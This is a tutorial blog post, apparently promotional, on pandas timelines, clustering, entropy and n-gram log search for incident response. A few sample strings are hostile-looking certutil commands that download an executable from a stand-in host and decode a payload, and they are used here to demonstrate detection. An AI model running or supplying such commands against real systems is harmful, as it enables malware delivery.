When you're three hours into an incident with three hundred thousand log lines, "look at the logs" is not an action plan. Data science techniques exist to reduce that problem to something tractable.
This isn't about replacing IR tools. It's about augmenting them with analysis patterns that handle scale, identify structure in noisy data, and compress the time between "data dump" and "here's what happened."
Timeline Reconstruction with Pandas
Building a complete attack timeline is often the first priority in IR. Evidence comes from multiple sources: Windows Security events, Zeek connection logs, Sysmon events, file system timestamps. Getting them into a single chronological view manually is error-prone.
pandas handles this well. The key is normalizing timestamps to UTC and concatenating sources into one time-sorted frame:
import pandas as pd
from evtx import PyEvtxParser
import json

def load_windows_events(path, event_ids=None):
    parser = PyEvtxParser(path)
    records = [json.loads(r['data']) for r in parser.records_json()]
    df = pd.json_normalize(records)
    df['timestamp'] = pd.to_datetime(
        df['Event.System.TimeCreated.#attributes.SystemTime'], utc=True
    )
    if event_ids:
        df = df[df['Event.System.EventID'].isin(event_ids)]
    return df
def load_zeek_conn(path):
    # Zeek TSV logs declare their column names in a '#fields' header line.
    with open(path) as f:
        for line in f:
            if line.startswith('#fields'):
                cols = line.strip().split('\t')[1:]
                break
    df = pd.read_csv(path, sep='\t', comment='#', names=cols, na_values=['-', '(empty)'])
    df['timestamp'] = pd.to_datetime(df['ts'], unit='s', utc=True)
    return df
events = pd.concat([
    load_windows_events('Security.evtx', event_ids=[4624, 4625, 4688]).assign(source='windows'),
    load_zeek_conn('conn.log').assign(source='zeek'),
], ignore_index=True).sort_values('timestamp')
The source column preserves which log each event came from. Sort ascending and you have a cross-source timeline where successful logons (Event ID 4624) appear alongside the network connections they correspond to.
The common failure: mixing naive (no timezone) and tz-aware timestamps. Force UTC on every source at load time to avoid merge errors later.
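A minimal sketch of that normalization step, with illustrative values standing in for real log fields:

```python
import pandas as pd

# One source emits naive timestamp strings, another epoch seconds.
naive = pd.Series(["2026-05-01 13:05:00", "2026-05-01 13:07:30"])
epoch = pd.Series([1777000000.5])

# utc=True yields tz-aware UTC; naive inputs are interpreted as UTC.
ts_a = pd.to_datetime(naive, utc=True)
ts_b = pd.to_datetime(epoch, unit="s", utc=True)

# If a source is known to be in local time, localize first, then convert.
local = pd.to_datetime(naive).dt.tz_localize("US/Eastern").dt.tz_convert("UTC")

# Now concat/sort works without tz mismatch errors.
combined = pd.concat([ts_a, ts_b], ignore_index=True).sort_values()
print(combined.dt.tz)  # UTC
```

Skipping the `utc=True` on even one loader is what produces the "Cannot compare tz-naive and tz-aware" errors at concat time.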
Clustering to Group Related Activity
During triage, you often need to group a large number of related artifacts: commands executed, IPs contacted, file paths modified. Clustering finds structure that manual review misses at scale.
Suppose you pull a list of command-line executions from Sysmon Event ID 1 (MITRE ATT&CK T1059) and need to identify distinct malware families or attacker toolsets within them. TF-IDF vectors plus DBSCAN cluster similar commands without requiring a predefined number of clusters:
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import DBSCAN
from sklearn.preprocessing import normalize
vectorizer = TfidfVectorizer(analyzer='word', ngram_range=(1, 2), max_features=500)
X = vectorizer.fit_transform(df_cmds['cmdline'].fillna(''))
X_normalized = normalize(X)
db = DBSCAN(eps=0.3, min_samples=2, metric='cosine')
df_cmds['cluster'] = db.fit_predict(X_normalized)
for cluster_id in sorted(df_cmds['cluster'].unique()):
    print(f"\nCluster {cluster_id}:")
    print(df_cmds[df_cmds['cluster'] == cluster_id]['cmdline'].head(5).to_string())
eps=0.3 on cosine distance controls how similar two commands need to be to belong to the same cluster. Cluster -1 is DBSCAN's noise label for points that don't group with anything, which is often where the most unusual activity lives: attacker tooling that appeared once and doesn't resemble anything else in the dataset.
The same pattern applies to network activity: cluster destination IPs by shared ASN and reverse DNS patterns to separate C2 infrastructure from legitimate traffic, or cluster DNS queries by character entropy to identify DGA domain families (MITRE ATT&CK T1568.002).
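Character entropy is cheap to compute; here is a standard-library sketch (the example domains and any threshold you'd apply are illustrative):

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's character distribution."""
    counts = Counter(s)
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# DGA-style labels tend toward higher entropy than dictionary words.
for label in ["google", "xkq7vbz2mfp9"]:
    print(label, round(shannon_entropy(label), 2))
# google -> 1.92, xkq7vbz2mfp9 -> 3.58
```

Entropy alone is a weak signal (CDN and cloud hostnames also score high), so it works best as one feature feeding the clustering step rather than a standalone detector.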
NLP for Log Search at Scale
During IR, you often need to answer specific questions against log data that isn't well-indexed: find any reference to this hostname across all log sources, or find commands that resemble known credential-dumping patterns.
For structured logs with machine-parseable fields, SQL-style filtering works. For free-form log text (application logs, bash history, webserver access logs), TF-IDF similarity lets you find relevant entries against a natural-language query without requiring exact string matches:
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
import numpy as np
# log_lines: list of strings, one per log entry
vectorizer = TfidfVectorizer(analyzer='char_wb', ngram_range=(3, 4))
corpus_vectors = vectorizer.fit_transform(log_lines)
def search_logs(query, top_n=20):
    query_vec = vectorizer.transform([query])
    scores = cosine_similarity(query_vec, corpus_vectors)[0]
    top_indices = np.argsort(scores)[::-1][:top_n]
    return [(log_lines[i], round(scores[i], 3)) for i in top_indices if scores[i] > 0]
results = search_logs("certutil download base64 decode", top_n=25)
Character-level n-grams (char_wb, ngram_range=(3, 4)) are more tolerant of obfuscation than word-level tokenization. An attacker using cert util with a space, or CeRtUtIl with mixed case, still produces character trigrams that overlap with the query.
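That overlap is easy to verify directly. A standard-library sketch using character trigram sets, with Jaccard similarity standing in for TF-IDF cosine (the command strings are made-up examples):

```python
def char_ngrams(text: str, n: int = 3) -> set:
    """Lowercased character n-grams, mirroring case-insensitive matching."""
    t = text.lower()
    return {t[i:i + n] for i in range(len(t) - n + 1)}

def jaccard(a: str, b: str) -> float:
    ga, gb = char_ngrams(a), char_ngrams(b)
    return len(ga & gb) / len(ga | gb)

query = "certutil download base64 decode"
print(jaccard(query, "certutil -urlcache -f http://example/x.exe"))
print(jaccard(query, "CeRtUtIl -decode payload.b64 out.exe"))  # mixed case still overlaps
print(jaccard(query, "net user admin /add"))  # unrelated: near zero
```

The mixed-case variant still scores well above the unrelated command, which is the property that makes character n-grams robust to casing and spacing tricks.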
This doesn't replace a SIEM with proper full-text indexing. It's for working with log archives that aren't in your SIEM, with log types your SIEM can't parse, or in environments where your normal toolchain isn't accessible.
When Notebooks Become Evidence
Jupyter notebooks used during IR are analysis artifacts that can become case evidence. Document analytical decisions inside cells: why you applied a specific filter, what a cluster ID represents, which IOCs you excluded and why. Future analysts and legal counsel will need to follow your reasoning.
When converting findings to a report for stakeholders, nbconvert exports the notebook including all output:
jupyter nbconvert --to html ir_analysis_2026-05-01.ipynb --output-dir ./reports/
Keep both the raw notebook and the exported HTML. The HTML is for sharing; the notebook preserves the analysis logic for follow-up questions.
What This Doesn't Replace
These techniques are force multipliers, not substitutes for forensic tools. They don't replace Autopsy, Volatility, or Plaso. The pattern is: Plaso builds the timeline, pandas lets you filter and analyze it; Volatility extracts memory artifacts, Python processes what Volatility extracts.
The gap most IR teams have isn't in forensic tooling. It's in analyzing data at scale once it's collected. That's where data science skills pay off in IR work.
GTK Cyber's applied data science training covers these techniques hands-on, with labs built around realistic IR datasets and scenarios practitioners encounter in real investigations.